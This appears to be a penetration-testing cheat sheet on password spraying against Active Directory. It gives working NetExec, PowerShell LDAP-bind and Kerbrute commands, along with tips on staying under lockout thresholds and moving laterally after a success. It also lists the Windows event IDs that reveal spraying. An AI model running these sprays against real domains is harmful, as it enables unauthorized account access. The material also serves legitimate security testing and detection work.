Password Spraying

Password Policy

Before attempting any password attacks, check the domain's account lockout policy to avoid locking out accounts or triggering alerts. For instance, based on the below policy, we can safely try 4 login attempts per user every 30 minutes (192 attempts per user per day):

# List the domain's password policy (Linux - NetExec)
nxc smb <target-ip> -u <user> -p <pass> --pass-pol

# List the account policy (Windows)
> net accounts
...
Lockout threshold:                                    5
Lockout duration (minutes):                           30
Lockout observation window (minutes):                 30
...

LDAP-Based

This method leverages LDAP binding via PowerShell’s .NET libraries. It attempts authentication by trying to create an LDAP object; if it succeeds, it means that the credentials are valid. This method is stealthy as it has no interactive log in and respects lockout policy, but is slow and limited to one password per run.

This can be done manually; if the password is invalid it will throw an error, otherwise it will return the domain name. Automated scripts (LDAPSpray) also exist.

# Get the domain and PDC
$domain = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
$PDC = $domain.PdcRoleOwner.Name

# Construct the LDAP path
$ldap = "LDAP://$PDC/DC=" + $domain.Name.Replace('.', ',DC=')
# Attempt authentication
$entry = New-Object System.DirectoryServices.DirectoryEntry($ldap, "pete", "Nexus123!")

# Trigger authentication
$entry.distinguishedName  # Triggers authentication

SMB-Based

This method involves a full SMB session setup/teardown on each authentication attempt so it's slow, noisy, and does not respect the lockout policy.

If (Pwn3d!) with nxc → use psexec, wmiexec, or secretsdump for lateral movement or PE.

nxc smb <dc-IP> -u <userlist> -p 'Passw0rd123!' --continue-on-success

Kerberos-Based

This method leverages Kerberos AS‑REQ messages to test user credentials without establishing a full authentication session. Each attempt requires only two UDP packets: an AS‑REQ followed by either an AS‑REP or an error response from the KDC. As a result, it is efficient and generates minimal network traffic compared to other authentication techniques. This approach is commonly used for password spraying and can be automated with tools such as Kerbrute, a cross‑platform utility that sends AS‑REQ requests at scale and interprets the responses to identify valid credentials.

In practice, this technique is well suited for horizontal brute‑force attempts, where one or two common passwords are tested against a large list of users. Because each failed authentication still counts toward the domain’s lockout policy, careless spraying can trigger account lockouts. From a detection perspective, this activity generates two specific Kerberos‑related events in Windows logs which can be correlated to identify password spraying activity:

• Event ID 4768 → A Kerberos authentication ticket (TGT) was requested

• Event ID 4771 → Kerberos pre-authentication failed

Ensure files are encoded in ANSI, not UTF-8 with BOM. If Kerbrute pops strange network errors, try re-saving the file in Notepad with Encoding: ANSI.

.\kerbrute_windows_amd64.exe passwordspray users.txt "Passw0rd123!" -d corp.com